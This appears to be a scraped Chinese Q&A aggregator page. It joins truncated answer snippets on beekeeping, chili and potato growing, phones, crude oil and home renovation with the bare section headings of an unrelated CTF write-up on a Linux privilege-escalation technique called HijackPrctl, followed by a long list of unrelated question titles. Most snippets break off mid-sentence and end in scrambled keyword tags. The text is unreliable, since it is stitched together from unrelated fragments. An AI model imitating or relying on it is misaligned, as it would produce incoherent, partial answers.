蜜蜂爬到:大热天蜜蜂老是爬到箱外结群正常吗？盗蜂现在正是夏季，很多地方蜜源稀少，蜂群中可能缺蜜，也是胡蜂猖獗的时间，所以蜂群中是非常容易发生盗蜂的。在蜂群中发生盗蜂的时候，蜂群守卫蜂会增多，但是这种情况引发的蜜蜂在蜂箱外一般不会结团，只是蜜蜂来:-大热天

辣椒正是生长最佳期，偏偏有的辣椒苗蔫，不是病虫害是咋回事？

最佳期雾都山客来回答您的问题。最近山客家乡的村民正在进行辣椒移栽，确实有像题主提到的情形，辣椒苗移栽前长势葱葱，嫩绿喜人，但是移栽后几天内就出现萎蔫现象，细心观察也不是被病虫害危害。那究竟是什么原因导致辣椒:-苗蔫辣椒咋回事:辣椒正是生长最佳期，偏偏有的辣椒苗蔫，不是病虫害是咋回事？

手机相机发展的最终形态会是怎样的？

最近这几年手机在电子产品行业里可谓是发展速度非常快，苹果和华为两大公司可以说也是，明争暗斗，产品一次比一次有卖点，前一段时间华为和苹果还都推出了手机新品，两家都在大力宣传强调着拍照功能，像iPhone:-形态相机手机最终:手机相机发展的最终形态会是怎样的？

华为为什么不出一款5寸全面屏手机呢？我想应该会有很多人支持吧？

5寸手机支持:华为为什么不出一款5寸全面屏手机呢？我想应该会有很多人支持吧？很高兴回答你的问题，刷头条刷出来的问题，看到很多人回答，感觉还有一些观点没有写出，所以我来回答一下。首先，华为为什么不出小尺寸全面屏手机？其实并不只有华为一家没有出小屏手机，放眼近期各大手机厂商发布的:-华为

生吃山芋，生吃胡萝卜，还有哪些蔬菜可以生吃呢？

胡萝卜蔬菜:生吃山芋，生吃胡萝卜，还有哪些蔬菜可以生吃呢？第一种，黄瓜。这个瓜，可不是菜市场中堆放满满的青瓜。各位可要睁大眼睛看清楚了，这个黄瓜，青中带黄，品种属以前乡下农户少量种植的，形态上面来看这种瓜矮、短、圆，表面覆盖有比较淡的细毛，经水轻轻冲洗之后整:-山芋

为什么马铃薯不宜过早过迟播种？

不宜:为什么马铃薯不宜过早过迟播种？播种过早为什么马铃薯不宜过早过迟播种？马铃薯的种植主要是由于气候条件的限制，过早出苗后容易遇到低温被冻死，种植晚了容易遇到干旱和高温，影响产量。马铃薯种植时间的早晚必须根据种植地方的气候条件来确定。马铃薯生长:-马铃薯

疫情愈发严重，原油为何反而大涨？

原油愈发:疫情愈发严重，原油为何反而大涨？疫情愈发严重和原油大涨没有必然关系。但是资金总是从高处流向低处，原油价格跌的越多，投资价值越明显，相对于其他产业更有投资价值。举个例子：深圳南山房价均价大约6万左右，宝安均价5万左右，如果南山房价涨到:-疫情

生菜球很好吃，怎么种植才能高产呢？

种植:生菜球很好吃，怎么种植才能高产呢？高产对环境条件的要求、1.温度生菜球为喜冷凉、忌高温作物，种子在4度以上可发芽、以15～20度为发芽适温。幼苗能耐较低温度，日平均温度12度时生长壮健，叶球生长最适温度为13～16度。不过目前有些结球生菜:-生菜

装修高手来帮忙看下144平，套内122平，怎么三房改四房？？

看下这个户型三房改四房，改一个小房间，应该没有问题。△原户型图这个户型改四房，能改的方案比较多，但是修改以后是否好用，是一件值得考虑的事情。一、主卧室变为两个卧室可以将主卧室改为两个卧室，但是这样的改动占:-房改 122:装修高手来帮忙看下144平，套内122平，怎么三房改四房？？ 144

大家帮忙看看这个房子如果要砸墙的话，怎么改比较好？

房子:大家帮忙看看这个房子如果要砸墙的话，怎么改比较好？这个户型砸墙，当然可以砸墙，但是在砸墙之前，要搞清楚为什么要砸墙，砸墙以后有什么优劣。△原户型原户型图上的白色墙体部分不是承重墙，理论上说否可以砸掉。但是外墙和与旁边户型或者是公共区域的共用墙体和图上:-帮忙

意蜂夏季喝什么水降温？

降温意蜂夏季喝什么水降温？气温高，蜂巢温度高的情况下，蜜蜂是通过采水的办法挂在蜂箱的四壁来蒸发带走热量，降低蜂巢温度同时也能帮助蜂群维持正常的湿度。在平常的情况下，蜜蜂是在室外采自然水的。夏季消耗的水量:-意蜂夏季:意蜂夏季喝什么水降温？

黄瓜种子催芽后种植需要打底水吗？

黄瓜种子:黄瓜种子催芽后种植需要打底水吗？你好很高兴回答这个问题。答案：不用。1-2天可出芽。黄瓜种子催芽：选用饱满的种子，用30℃水浸泡4小时后催芽。也可用100倍福尔马林溶液浸泡种子10-20分钟，洗净后清水浸种3-4小时，然后于25-3:-催芽黄瓜打底

书友们展示一下自我感觉发挥较好的作品，一起学习？

自我较好这幅作品是参赛的，色彩的搭配，纸张的拼接都是自己设计完成的，一如既往的清新淡雅感觉。书体用的魏碑中楷书，增加了书写的趣味性。:-书友展示:书友们展示一下自我感觉发挥较好的作品，一起学习？

强网杯出题思路-solid_core-HijackPrctl

0x00 概述

0x01 任意地址读写到权限提升(传统思路)

0x02 题目修改思路

0x03 HijackPrctl- A reliable linux root Techniques

0x04 写在后面

相關文章:

刚刚工作的毕业生，一个月只有2000多，是不是太少了？

为什么只有edg赚钱？

网上罗马仕充电宝20000毫安的，参数怎么很多样？哪个是真的？

我们买的新商品房还没有拿到房产证，怎么转卖最好？

为什么突厥人可以成功复国？是大唐的刀不锋利了么？

小高层16层高楼间距60米哪一层比较好？

金银花盆栽好养吗？怎么养？

长城对于抵御古代匈奴和蒙古人起到了多大作用？

什么树可以嫁接腊梅？

行情堪忧，还有多少教育机构的老师们五一假期有课上的？课时量多不多？

在农村“立夏节”都有哪些民间习俗？

男朋友失望分手，但对我还有感觉，答应我两个月之后可以在一起，我应该怎么做，才能改变之前他对我的看法？

工程分包乙方人员伤残谁承担？

有哪些看起来毫不相关的两个历史人物实际上有过联系？

13年雪铁龙世嘉自动挡7万多公里，没有水泡事故，多少钱能买？

22+吃土少女17年就有驾驶证了，今年才开始开车，想买个二手昂克赛拉，或者有什么好建议吗？

如何骑车去台湾骑行？

本人预算5万左右，想买一辆二手法系车！求推荐？

14年进口马自达5PK进口10年道奇酷威买哪个划算？

2020年，河南教育行业国务院特殊津贴推荐，河南大学并列第三，大家怎么看？

本田CRV2019款1.5T舒适版油耗高吗？

国外疫情如果没有得到有效控制，世界会发生什么事情？头脑风暴？

本田XRV这款车的整体表现怎么样？我想买1.5T自动豪华版，全款多少钱？

现在存款有14万，借了5万还没收回来，该做什么好？

2070super和5700xt买哪个比较好？

生完二胎后，感觉自己有点抑郁，总是想发火，特别烦躁，怎么办？

人这一生遇到的人和事为什么感觉都像是必然的经历？

现在校内校外到底教的是美式英语还是英式英语还是混搭英语？

上有老下有小，我们真的跳不出这个人生循环了吗？

如果外面正在下小雨，你会突然想起了谁？

初中同学许久未见大学期间突然联系请吃饭，态度还良好，我给推了，会不会让人很烦？

现在我觉得认真对某个人说我喜欢你什么的这种话好恶心，我爱你更说不出口，好恶心，是什么心理？

剧版的《何以笙箫默》和《再见王沥川》哪一个更好看呢？

计算机专业本科能够进入字节跳动、华为这些公司做开发吗？是否还需要继续读研？

生完二胎的你们，现在有什么感想？

华北适合种植蚕豆吗？

华为手机更新EMUI10.1系统后效果咋样？

大热天蜜蜂老是爬到箱外结群正常吗？

辣椒正是生长最佳期，偏偏有的辣椒苗蔫，不是病虫害是咋回事？

手机相机发展的最终形态会是怎样的？

华为为什么不出一款5寸全面屏手机呢？我想应该会有很多人支持吧？

生吃山芋，生吃胡萝卜，还有哪些蔬菜可以生吃呢？

为什么马铃薯不宜过早过迟播种？

疫情愈发严重，原油为何反而大涨？

生菜球很好吃，怎么种植才能高产呢？

装修高手来帮忙看下144平，套内122平，怎么三房改四房？ ？

大家帮忙看看这个房子如果要砸墙的话，怎么改比较好？

意蜂夏季喝什么水降温？

黄瓜种子催芽后种植需要打底水吗？

书友们展示一下自我感觉发挥较好的作品，一起学习？

宝鸡将来会不会一直向东扩张，形成六区城市格局？

家用的话，买几座的轻客比较合适？

女儿是成年人，但很任性不顾家人感受，该怎么办？

有的人想买下农村的破旧空置房，但是其产权问题受政策影响，应该如何解决？

连续开车7–8个小时是什么样的体验？

在爱情面前你是强势的一方，还是忍让的一方？为什么？

辞职以后又回到原公司入职是一种什么体验？

院里挖个小鱼塘，在什么位置合适？长、宽、高分别是多少合适，就可以养鱼和种荷花？

娶一个离过婚的女人是什么感觉？

电视背景墙如何装修可以既实惠又气派上档次？

自己改造的房车不拆座椅的情况下可以上路吗？

日本铃木房车何时可以进入国内市场？你怎么看？

有家庭的人又爱上一个有家的人该怎么办？

贵阳的小河、花溪版块会成为第二个观山湖吗？

什么季节去甘南玩最好？

想长途自驾游，夫妻二人大多时间睡车上，除房车外推荐哪款车？

为什么越来越多的人选择床车自由行呢？

林黛玉寄人篱下是因为家里穷吗？

有哪一刻你会觉得生活没有意义？

长期遭公婆辱骂，儿子与儿媳被迫迁出到异乡落户，公婆找上门来要求养老，这样是否合理？对此你怎么看？

父母没有履行抚养义务，子女长大后是否需要赡养？

山东省机构改革从什么时候开始？

新房有甲醛，通风太缓慢了，怎样安全又快速的住进去？有哪些建议？

装修高手来帮忙看下144平，套内122平，怎么三房改四房？？